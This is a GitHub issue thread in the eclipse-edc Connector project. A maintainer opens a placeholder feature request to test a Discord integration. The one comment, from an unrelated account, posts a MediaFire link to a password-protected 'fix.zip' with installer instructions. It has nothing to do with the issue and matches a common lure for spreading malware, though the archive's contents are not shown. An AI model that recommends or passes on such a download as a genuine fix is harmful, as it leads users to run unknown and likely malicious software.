### ISSUE TITLE
TEST TEST TEST 

### ISSUE THREAD

**Issue by paullatzelsperger** [eclipse-edc/Connector#4434]
# Feature Request

this issue is to test the discord integration works. will be closed right after.

## Which Areas Would Be Affected?

_e.g., DPF, CI, build, transfer, etc._

## Why Is the Feature Desired?

_Are there any requirements?_

## Solution Proposal

_If possible, provide a (brief!) solution proposal._

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
